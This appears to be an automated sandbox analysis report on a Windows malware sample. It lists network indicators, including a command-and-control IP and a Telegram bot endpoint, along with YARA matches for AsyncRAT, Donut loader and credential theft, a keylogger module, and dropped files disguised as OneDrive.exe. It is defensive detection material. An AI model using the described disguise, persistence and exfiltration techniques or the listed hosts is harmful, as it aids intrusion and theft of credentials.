                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: ip-api.com
                        Source: powershell.exe, 00000002.00000002.2330216159.000001949CC1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                        Source: powershell.exe, 00000002.00000002.2330216159.000001949CC1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                        Source: arndry.exe, 00000009.00000002.2501821797.000000000244A000.00000004.00000800.00020000.00000000.sdmp, arndry.exe, 00000009.00000002.2501821797.0000000002454000.00000004.00000800.00020000.00000000.sdmp, arndry.exe, 00000009.00000002.2501821797.000000000243C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                        Source: arndry.exe, 00000009.00000002.2499722879.000000000065C000.00000004.00000020.00020000.00000000.sdmp, arndry.exe, 00000009.00000002.2501821797.000000000239D000.00000004.00000800.00020000.00000000.sdmp, arndry.exe, 00000009.00000000.2419775202.00000000001D2000.00000002.00000001.01000000.00000009.sdmp, arndry.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: b39wW3jYKO.exe, 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                        Source: powershell.exe, 00000002.00000002.2319507770.00000194948FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 00000002.00000002.2291460980.0000019484AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000002.00000002.2291460980.0000019484AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: b39wW3jYKO.exe, 00000000.00000002.4618510904.00000141820D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2291460980.0000019484891000.00000004.00000800.00020000.00000000.sdmp, arndry.exe, 00000009.00000002.2501821797.000000000243C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000002.00000002.2291460980.0000019484AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net
                        Source: powershell.exe, 00000002.00000002.2291460980.0000019484AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: tmpE9CD.tmp.dat.0.dr, tmp8A2A.tmp.dat.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: powershell.exe, 00000002.00000002.2291460980.0000019484891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: arndry.exe, 00000009.00000000.2419775202.00000000001D2000.00000002.00000001.01000000.00000009.sdmp, arndry.exe.0.drString found in binary or memory: https://api.telegram.org/bot
                        Source: tmpE9CD.tmp.dat.0.dr, tmp8A2A.tmp.dat.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: tmpE9CD.tmp.dat.0.dr, tmp8A2A.tmp.dat.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: tmpE9CD.tmp.dat.0.dr, tmp8A2A.tmp.dat.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: powershell.exe, 00000002.00000002.2319507770.00000194948FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000002.00000002.2319507770.00000194948FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000002.00000002.2319507770.00000194948FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: tmpE9CD.tmp.dat.0.dr, tmp8A2A.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: tmpE9CD.tmp.dat.0.dr, tmp8A2A.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: tmpE9CD.tmp.dat.0.dr, tmp8A2A.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: b39wW3jYKO.exe, 00000000.00000002.4618510904.00000141820D1000.00000004.00000800.00020000.00000000.sdmp, b39wW3jYKO.exe, 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty
                        Source: powershell.exe, 00000002.00000002.2291460980.0000019484AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: OneDrive.exe, 00000008.00000002.2581561823.0000012969141000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2590105516.0000012971900000.00000004.08000000.00040000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2581561823.00000129695E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                        Source: OneDrive.exe, 00000008.00000002.2581561823.0000012969141000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2590105516.0000012971900000.00000004.08000000.00040000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2581561823.00000129695E2000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 0000000E.00000002.2657598951.0000019A37398000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                        Source: OneDrive.exe, 00000008.00000002.2581561823.0000012969141000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2590105516.0000012971900000.00000004.08000000.00040000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2581561823.00000129695E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                        Source: powershell.exe, 00000002.00000002.2319507770.00000194948FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: OneDrive.exe, 00000008.00000002.2581561823.0000012969141000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2590105516.0000012971900000.00000004.08000000.00040000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2581561823.00000129695E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                        Source: b39wW3jYKO.exe, 00000000.00000002.4618510904.00000141820D1000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2581561823.0000012969141000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2577826782.00000129591E0000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2590105516.0000012971900000.00000004.08000000.00040000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2581561823.00000129695E2000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 0000000E.00000002.2653178477.0000019A26F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                        Source: OneDrive.exe, 00000008.00000002.2581561823.0000012969141000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2590105516.0000012971900000.00000004.08000000.00040000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2581561823.00000129695E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                        Source: tmpBE60.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org
                        Source: tmpBE60.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: tmpBE60.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
                        Source: b39wW3jYKO.exe, 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_see
                        Source: b39wW3jYKO.exe, 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_seeaCould
                        Source: tmpE9CD.tmp.dat.0.dr, tmp8A2A.tmp.dat.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: tmpE9CD.tmp.dat.0.dr, tmp8A2A.tmp.dat.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: b39wW3jYKO.exe, 00000000.00000002.4636065933.000001419265B000.00000004.00000800.00020000.00000000.sdmp, places.raw.0.dr, tmpBE60.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org
                        Source: tmpBE60.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org#
                        Source: tmpBE60.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                        Source: tmpBE60.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                        Source: tmpBE60.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: b39wW3jYKO.exe, 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                        Source: b39wW3jYKO.exe, 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Contains functionality to log keystrokes (.Net Source)
                        Source: arndry.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 0.2.b39wW3jYKO.exe.1419b110000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                        Source: 0.2.b39wW3jYKO.exe.1419b110000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                        Source: 9.0.arndry.exe.1d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 00000000.00000002.4647563742.000001419B000000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                        Source: 00000009.00000000.2419775202.00000000001D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000000.00000002.4648624073.000001419B110000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                        Source: 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 00000000.00000002.4636065933.000001419257D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                        Source: 00000000.00000002.4618510904.00000141820D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: Process Memory Space: b39wW3jYKO.exe PID: 6412, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_000001419AFB6E5B0_2_000001419AFB6E5B
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD347F57AD0_2_00007FFD347F57AD
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD347F9C900_2_00007FFD347F9C90
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD349291080_2_00007FFD34929108
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD349291080_2_00007FFD34929108
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34B7E5E40_2_00007FFD34B7E5E4
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34B78E0D0_2_00007FFD34B78E0D
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34B7DDD10_2_00007FFD34B7DDD1
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34B7A7450_2_00007FFD34B7A745
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34B703790_2_00007FFD34B70379
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E5854A0_2_00007FFD34E5854A
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E594960_2_00007FFD34E59496
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E5059F0_2_00007FFD34E5059F
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E504000_2_00007FFD34E50400
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E4ABB40_2_00007FFD34E4ABB4
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E595030_2_00007FFD34E59503
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E596500_2_00007FFD34E59650
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E52DFA0_2_00007FFD34E52DFA
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E505E00_2_00007FFD34E505E0
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E52FC50_2_00007FFD34E52FC5
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E532C20_2_00007FFD34E532C2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD346656EA2_2_00007FFD346656EA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34665BFA2_2_00007FFD34665BFA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34666FFA2_2_00007FFD34666FFA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347330E92_2_00007FFD347330E9
                        Source: C:\Users\user\Documents\OneDrive.exeCode function: 8_2_00007FFD348157AD8_2_00007FFD348157AD
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeCode function: 9_2_00007FFD346820A19_2_00007FFD346820A1
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeCode function: 9_2_00007FFD346812E99_2_00007FFD346812E9
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeCode function: 9_2_00007FFD34685DD69_2_00007FFD34685DD6
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeCode function: 9_2_00007FFD34686B829_2_00007FFD34686B82
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeCode function: 9_2_00007FFD34680F1D9_2_00007FFD34680F1D
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeCode function: 9_2_00007FFD346813299_2_00007FFD34681329
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeCode function: 9_2_00007FFD34680E289_2_00007FFD34680E28
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeCode function: 9_2_00007FFD34681E0D9_2_00007FFD34681E0D
                        Source: C:\Users\user\Documents\OneDrive.exeCode function: 14_2_00007FFD348057AD14_2_00007FFD348057AD
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3804 -s 1632
                        Source: OneDrive.exe.0.drStatic PE information: No import functions for PE file found
                        Source: b39wW3jYKO.exeStatic PE information: No import functions for PE file found
                        Source: b39wW3jYKO.exeBinary or memory string: OriginalFilename vs b39wW3jYKO.exe
                        Source: b39wW3jYKO.exe, 00000000.00000002.4644423945.000001419AC09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOneDrive.exe4 vs b39wW3jYKO.exe
                        Source: b39wW3jYKO.exe, 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRecovery.dll2 vs b39wW3jYKO.exe
                        Source: b39wW3jYKO.exe, 00000000.00000002.4646804706.000001419AFB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs b39wW3jYKO.exe
                        Source: b39wW3jYKO.exe, 00000000.00000002.4648202553.000001419B070000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameOneDrive.exe4 vs b39wW3jYKO.exe
                        Source: b39wW3jYKO.exe, 00000000.00000002.4648624073.000001419B110000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameOptions.dll0 vs b39wW3jYKO.exe
                        Source: b39wW3jYKO.exe, 00000000.00000000.2129581146.0000014180441000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOneDrive.exe2 vs b39wW3jYKO.exe
                        Source: b39wW3jYKO.exeBinary or memory string: OriginalFilenameOneDrive.exe2 vs b39wW3jYKO.exe
                        Source: 0.2.b39wW3jYKO.exe.1419b110000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                        Source: 0.2.b39wW3jYKO.exe.1419b110000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                        Source: 9.0.arndry.exe.1d0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 00000000.00000002.4647563742.000001419B000000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                        Source: 00000009.00000000.2419775202.00000000001D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000000.00000002.4648624073.000001419B110000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                        Source: 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 00000000.00000002.4636065933.000001419257D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                        Source: 00000000.00000002.4618510904.00000141820D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: Process Memory Space: b39wW3jYKO.exe PID: 6412, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: b39wW3jYKO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: OneDrive.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: arndry.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                        Source: arndry.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                        Source: arndry.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                        Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                        Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                        Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                        Source: arndry.exe.0.dr, Settings.csBase64 encoded string: 'ko4cJ6jZSRXGOzxb+X/XIypASEw9BMK4sxdQOppaCJiDJRjXWttzrtDR1WmRtFf1', 'UiWEarYOsqLo292Ez/XbQx9AfwVWFkGbdqSTgDuOJUV/fmusAQ9KdH+sVpZFgy1v', 'NBW9o6+cDOocLnfX9iRvSMNwH7/BNABTq1jCY0Bc7D4xYvJbFZ1qoE/Qm2R+f6VP'
                        Source: arndry.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: arndry.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.b39wW3jYKO.exe.1419b110000.2.raw.unpack, Helper.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.2.b39wW3jYKO.exe.1419b110000.2.raw.unpack, Helper.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                        Source: 0.2.b39wW3jYKO.exe.1419b110000.2.raw.unpack, Botkiller.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.2.b39wW3jYKO.exe.1419b110000.2.raw.unpack, Botkiller.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                        Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                        Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                        Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/26@1/2
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD3492952A AdjustTokenPrivileges,0_2_00007FFD3492952A
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile created: C:\Users\user\documents\OneDrive.exeJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeMutant created: NULL
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeMutant created: \Sessions\1\BaseNamedObjects\Tohcrtzmp
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2432:120:WilError_03
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeMutant created: \Sessions\1\BaseNamedObjects\QMHDjhLW52nOcp4a
                        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3804
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeMutant created: \Sessions\1\BaseNamedObjects\rizvP2PbycXS0qc6
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile created: C:\Users\user\AppData\Local\Temp\arndry.exeJump to behavior
                        Source: b39wW3jYKO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: b39wW3jYKO.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
